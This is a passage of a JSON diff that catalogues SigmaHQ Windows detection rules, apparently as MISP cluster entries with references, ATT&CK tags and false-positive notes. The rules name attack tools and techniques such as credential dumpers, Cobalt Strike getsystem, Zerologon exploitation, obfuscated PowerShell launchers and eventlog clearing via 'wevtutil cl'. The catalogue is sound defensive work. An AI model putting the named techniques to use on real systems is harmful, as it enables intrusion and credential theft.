caused by \"wevtutil cl\" command execution", + "uuid": "a62b37e0-45d3-48d9-a517-90c1a1b0186b", + "value": "Eventlog Cleared", + "meta": { + "refs": [ + "https://twitter.com/deviouspolack/status/832535435960209408", + "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_eventlog_cleared.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.001", + "car.2016-04-002" + ], + "creation_date": "2017/01/10", + "filename": "win_system_eventlog_cleared.yml", + "author": "Florian Roth", + "level": "low", + "falsepositive": [ + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of smbexec.py tool by detecting a specific service installation", + "uuid": "52a85084-6989-40c3-8f32-091e12e13f09", + "value": "smbexec.py Service Installation", + "meta": { + "refs": [ + "https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_hack_smbexec.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.execution", + "attack.t1021.002", + "attack.t1569.002" + ], + "creation_date": "2018/03/20", + "filename": "win_system_hack_smbexec.yml", + "author": "Omer Faruk Celik", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "uuid": "f7385ee2-0e0c-11eb-adc1-0242ac120002", + "value": "Invoke-Obfuscation CLIP+ Launcher - System", + "meta": { + "refs": [ + 
"https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_clip_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/13", + "filename": "win_system_invoke_obfuscation_clip_services.yml", + "author": "Jonathan Cheong, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", + "uuid": "51aa9387-1c53-4153-91cc-d73c59ae1ca9", + "value": "Invoke-Obfuscation Obfuscated IEX Invocation - System", + "meta": { + "refs": [ + "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_obfuscated_iex_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ], + "creation_date": "2019/11/08", + "filename": "win_system_invoke_obfuscation_obfuscated_iex_services.yml", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "uuid": "72862bf2-0eb1-11eb-adc1-0242ac120002", + "value": "Invoke-Obfuscation STDIN+ Launcher - System", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_stdin_services.yml" + ], + "tags": [ + 
"attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/15", + "filename": "win_system_invoke_obfuscation_stdin_services.yml", + "author": "Jonathan Cheong, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "uuid": "8ca7004b-e620-4ecb-870e-86129b5b8e75", + "value": "Invoke-Obfuscation VAR+ Launcher - System", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_var_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/15", + "filename": "win_system_invoke_obfuscation_var_services.yml", + "author": "Jonathan Cheong, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "uuid": "175997c5-803c-4b08-8bb0-70b099f47595", + "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - System", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_compress_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/18", + "filename": "win_system_invoke_obfuscation_via_compress_services.yml", + "author": "Timur Zinniatullin, oscd.community", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": 
"windows" + } + }, + { + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "uuid": "11b52f18-aaec-4d60-9143-5dd8cc4706b9", + "value": "Invoke-Obfuscation RUNDLL LAUNCHER - System", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_rundll_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/18", + "filename": "win_system_invoke_obfuscation_via_rundll_services.yml", + "author": "Timur Zinniatullin, oscd.community", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "uuid": "487c7524-f892-4054-b263-8a0ace63fc25", + "value": "Invoke-Obfuscation Via Stdin - System", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_stdin_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/12", + "filename": "win_system_invoke_obfuscation_via_stdin_services.yml", + "author": "Nikita Nazarov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "uuid": "63e3365d-4824-42d8-8b82-e56810fefa0c", + "value": "Invoke-Obfuscation Via Use Clip - System", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_use_clip_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/09", + "filename": "win_system_invoke_obfuscation_via_use_clip_services.yml", + "author": "Nikita Nazarov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "uuid": "7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4", + "value": "Invoke-Obfuscation Via Use MSHTA - System", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_use_mshta_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/09", + "filename": "win_system_invoke_obfuscation_via_use_mshta_services.yml", + "author": "Nikita Nazarov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "uuid": "641a4bfb-c017-44f7-800c-2aee0184ce9b", + "value": "Invoke-Obfuscation Via Use Rundll32 - System", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_use_rundll32_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/09", + "filename": "win_system_invoke_obfuscation_via_use_rundll32_services.yml", + "author": "Nikita 
Nazarov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "uuid": "14bcba49-a428-42d9-b943-e2ce0f0f7ae6", + "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_var_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/13", + "filename": "win_system_invoke_obfuscation_via_var_services.yml", + "author": "Timur Zinniatullin, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation", + "uuid": "e6f81941-b1cd-4766-87db-9fc156f658ee", + "value": "KDC RC4-HMAC Downgrade CVE-2022-37966", + "meta": { + "refs": [ + "https://support.microsoft.com/en-us/topic/kb5021131-how-to-manage-the-kerberos-protocol-changes-related-to-cve-2022-37966-fd837ac3-cdec-4e76-a6ec-86e67501407d", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_kdcsvc_rc4_downgrade.yml" + ], + "tags": [ + "attack.privilege_escalation" + ], + "creation_date": "2022/11/09", + "filename": "win_system_kdcsvc_rc4_downgrade.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects service creation from KrbRelayUp tool used for privilege escalation in windows domain 
environments where LDAP signing is not enforced (the default settings)", + "uuid": "e97d9903-53b2-41fc-8cb9-889ed4093e80", + "value": "KrbRelayUp Service Installation", + "meta": { + "refs": [ + "https://github.com/Dec0ne/KrbRelayUp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_krbrelayup_service_installation.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543" + ], + "creation_date": "2022/05/11", + "filename": "win_system_krbrelayup_service_installation.yml", + "author": "Sittikorn S, Tim Shelton", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode", + "uuid": "bc2e25ed-b92b-4daa-b074-b502bdd1982b", + "value": "Local Privilege Escalation Indicator TabTip", + "meta": { + "refs": [ + "https://github.com/antonioCoco/JuicyPotatoNG", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_lpe_indicators_tabtip.yml" + ], + "tags": [ + "attack.execution", + "attack.t1557.001" + ], + "creation_date": "2022/10/07", + "filename": "win_system_lpe_indicators_tabtip.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the reporting of NTLMv1 being used between a client and server", + "uuid": "e9d4ab66-a532-4ef7-a502-66a9e4a34f5d", + "value": "NTLMv1 Logon Between Client and Server", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1550/002/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_lsasrv_ntlmv1.yml" + ], + "tags": [ + "attack.execution", + "attack.t1550.002", + "attack.s0363" + ], + "creation_date": "2022/04/26", + "filename": 
"win_system_lsasrv_ntlmv1.yml", + "author": "Tim Shelton", + "level": "low", + "falsepositive": [ + "Environments that use NTLMv1" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects well-known credential dumping tools execution via service execution events", + "uuid": "4976aa50-8f41-45c6-8b15-ab3fc10e79ed", + "value": "Credential Dumping Tools Service Execution - System", + "meta": { + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_mal_creddumper.yml" + ], + "tags": [ + "attack.credential_access", + "attack.execution", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" + ], + "creation_date": "2017/03/05", + "filename": "win_system_mal_creddumper.yml", + "author": "Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "level": "high", + "falsepositive": [ + "Legitimate Administrator using credential dumping tool for password recovery" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", + "uuid": "843544a7-56e0-4dcc-a44f-5cc266dd97d6", + "value": "Meterpreter or Cobalt Strike Getsystem Service Installation - System", + "meta": { + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1134.001", + 
"attack.t1134.002" + ], + "creation_date": "2019/10/26", + "filename": "win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "level": "critical", + "falsepositive": [ + "Highly unlikely" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", + "uuid": "25b9c01c-350d-4b95-bed1-836d04a4f324", + "value": "Moriya Rootkit - System", + "meta": { + "refs": [ + "https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_moriya_rootkit.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ], + "creation_date": "2021/05/06", + "filename": "win_system_moriya_rootkit.yml", + "author": "Bhabesh Raj", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "This the exploitation of a NTFS vulnerability as reported without many details via Twitter", + "uuid": "f14719ce-d3ab-4e25-9ce6-2899092260b0", + "value": "NTFS Vulnerability Exploitation", + "meta": { + "refs": [ + "https://twitter.com/jonasLyk/status/1347900440000811010", + "https://twitter.com/wdormann/status/1347958161609809921", + "https://www.bleepingcomputer.com/news/security/windows-10-bug-corrupts-your-hard-drive-on-seeing-this-files-icon/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_ntfs_vuln_exploit.yml" + ], + "tags": [ + "attack.impact", + "attack.t1499.001" + ], + "creation_date": "2021/01/11", + "filename": "win_system_ntfs_vuln_exploit.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "No 
established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Windows Pcap driver installation based on a list of associated .sys files.", + "uuid": "7b687634-ab20-11ea-bb37-0242ac130002", + "value": "Windows Pcap Drivers", + "meta": { + "refs": [ + "https://ragged-lab.blogspot.com/2020/06/capturing-pcap-driver-installations.html#more", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_pcap_drivers.yml" + ], + "tags": [ + "attack.discovery", + "attack.credential_access", + "attack.t1040" + ], + "creation_date": "2020/06/10", + "filename": "win_system_pcap_drivers.yml", + "author": "Cian Heasley", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with \"kali\" hostname.", + "uuid": "18f37338-b9bd-4117-a039-280c81f7a596", + "value": "Zerologon Exploitation Using Well-known Tools", + "meta": { + "refs": [ + "https://www.secura.com/blog/zero-logon", + "https://bi-zone.medium.com/hunting-for-zerologon-f65c61586382", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_possible_zerologon_exploitation_using_wellknown_tools.yml" + ], + "tags": [ + "attack.t1210", + "attack.lateral_movement" + ], + "creation_date": "2020/10/13", + "filename": "win_system_possible_zerologon_exploitation_using_wellknown_tools.yml", + "author": "Demyan Sokolin @_drd0c, Teymur Kheirkhabarov @HeirhabarovT, oscd.community", + "level": "critical", + "falsepositive": "No established falsepositives", + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects powershell script installed as a Service", + "uuid": "a2e5019d-a658-4c6a-92bf-7197b54e2cae", + 
"value": "PowerShell Scripts Installed as Services", + "meta": { + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_powershell_script_installed_as_service.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002" + ], + "creation_date": "2020/10/06", + "filename": "win_system_powershell_script_installed_as_service.yml", + "author": "oscd.community, Natalia Shornikova", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects QuarksPwDump clearing access history in hive", + "uuid": "39f919f3-980b-4e6f-a975-8af7e507ef2b", + "value": "QuarksPwDump Clearing Access History", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_quarkspwdump_clearing_hive_access_history.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ], + "creation_date": "2017/05/15", + "filename": "win_system_quarkspwdump_clearing_hive_access_history.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects rare service installs that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious services", + "uuid": "66bfef30-22a5-4fcd-ad44-8d81e60922ae", + "value": "Rare Service Installations", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_rare_service_installs.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" + ], + "creation_date": "2017/03/08", + "filename": "win_system_rare_service_installs.yml", + "author": "Florian 
Roth", + "level": "low", + "falsepositive": [ + "Software installation", + "Software updates" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detect suspicious error on protocol RDP, potential CVE-2019-0708", + "uuid": "aaa5b30d-f418-420b-83a0-299cb6024885", + "value": "Potential RDP Exploit CVE-2019-0708", + "meta": { + "refs": [ + "https://github.com/zerosum0x0/CVE-2019-0708", + "https://github.com/Ekultek/BlueKeep", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_rdp_potential_cve_2019_0708.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" + ], + "creation_date": "2019/05/24", + "filename": "win_system_rdp_potential_cve_2019_0708.yml", + "author": "Lionel PRAT, Christophe BROCAS, @atc_project (improvements)", + "level": "medium", + "falsepositive": [ + "Bad connections or network interruptions" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the installation of the anydesk software service. 
Which could be an indication of anydesk abuse if you the software isn't already used.", + "uuid": "530a6faa-ff3d-4022-b315-50828e77eef5", + "value": "Anydesk Remote Access Software Service Installation", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_anydesk.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2022/08/11", + "filename": "win_system_service_install_anydesk.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate usage of the anydesk tool" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "uuid": "d26ce60c-2151-403c-9a42-49420d87b5e4", + "value": "Hacktool Service Registration or Execution", + "meta": { + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_hacktools.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ], + "creation_date": "2022/03/21", + "filename": "win_system_service_install_hacktools.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects a Mesh Agent service installation. 
Mesh Agent is used to remotely manage computers", + "uuid": "e0d1ad53-c7eb-48ec-a87a-72393cc6cedc", + "value": "Mesh Agent Service Installation", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_mesh_agent.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "creation_date": "2022/11/28", + "filename": "win_system_service_install_mesh_agent.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate use of the tool" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects NetSupport Manager service installation on the target system.", + "uuid": "2d510d8d-912b-45c5-b1df-36faa3d8c3f4", + "value": "NetSupport Manager Service Install", + "meta": { + "refs": [ + "http://resources.netsupportsoftware.com/resources/manualpdfs/nsm_manual_uk.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_netsupport_manager.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2022/10/31", + "filename": "win_system_service_install_netsupport_manager.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate use of the tool" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects PAExec service installation", + "uuid": "de7ce410-b3fb-4e8a-b38c-3b999e2c3420", + "value": "PAExec Service Installation", + "meta": { + "refs": [ + "https://www.poweradmin.com/paexec/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_paexec.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002" + ], + "creation_date": "2022/10/26", + "filename": 
"win_system_service_install_paexec.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects a PDQDeploy service installation which indicates that PDQDeploy was installed on the machines.\nPDQDeploy can be abused by attackers to remotely install packages or execute commands on target machines\n", + "uuid": "ee9ca27c-9bd7-4cee-9b01-6e906be7cae3", + "value": "New PDQDeploy Service - Server Side", + "meta": { + "refs": [ + "https://documentation.pdq.com/PDQDeploy/13.0.3.0/index.html?windows-services.htm", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_pdqdeploy.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543.003" + ], + "creation_date": "2022/07/22", + "filename": "win_system_service_install_pdqdeploy.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate use of the tool" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects PDQDeploy service installation on the target system.\nWhen a package is deployed via PDQDeploy it installs a remote service on the target machine with the name \"PDQDeployRunner-X\" where \"X\" is an integer starting from 1\n", + "uuid": "b98a10af-1e1e-44a7-bab2-4cc026917648", + "value": "New PDQDeploy Service - Client Side", + "meta": { + "refs": [ + "https://documentation.pdq.com/PDQDeploy/13.0.3.0/index.html?windows-services.htm", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_pdqdeploy_runner.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543.003" + ], + "creation_date": "2022/07/22", + "filename": "win_system_service_install_pdqdeploy_runner.yml", + "author": "Nasreddine Bencherchali", + "level": 
"medium", + "falsepositive": [ + "Legitimate use of the tool" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "uuid": "42c575ea-e41e-41f1-b248-8093c3e82a28", + "value": "PsExec Service Installation", + "meta": { + "refs": [ + "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", + "https://jpcertcc.github.io/ToolAnalysisResultSheet", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_psexec.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ], + "creation_date": "2017/06/12", + "filename": "win_system_service_install_psexec.yml", + "author": "Thomas Patzke", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Remote Utilities Host service installation on the target system.", + "uuid": "85cce894-dd8b-4427-a958-5cc47a4dc9b9", + "value": "Remote Utilities Host Service Install", + "meta": { + "refs": [ + "https://www.remoteutilities.com/support/kb/host-service-won-t-start/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_remote_utilities.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2022/10/31", + "filename": "win_system_service_install_remote_utilities.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate use of the tool" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands", + "uuid": "31c51af6-e7aa-4da7-84d4-8f32cc580af2", + "value": "Sliver C2 Default Service Installation", + "meta": { + 
"refs": [ + "https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/client/command/commands.go#L1231", + "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_sliver.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.t1543.003", + "attack.t1569.002" + ], + "creation_date": "2022/08/25", + "filename": "win_system_service_install_sliver.yml", + "author": "Florian Roth, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects a service installation that uses a suspicious double ampersand used in the image path value", + "uuid": "ca83e9f3-657a-45d0-88d6-c1ac280caf53", + "value": "New Service Uses Double Ampersand in Path", + "meta": { + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_susp_double_ampersand.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ], + "creation_date": "2022/07/05", + "filename": "win_system_service_install_susp_double_ampersand.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects a TacticalRMM service installation. 
Tactical RMM is a remote monitoring & management tool.", + "uuid": "4bb79b62-ef12-4861-981d-2aab43fab642", + "value": "TacticalRMM Service Installation", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_tacticalrmm.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "creation_date": "2022/11/28", + "filename": "win_system_service_install_tacticalrmm.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate use of the tool" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded", + "uuid": "13fc89a9-971e-4ca6-b9dc-aa53a445bf40", + "value": "DHCP Server Loaded the CallOut DLL", + "meta": { + "refs": [ + "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", + "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", + "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_dhcp_config.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ], + "creation_date": "2017/05/15", + "filename": 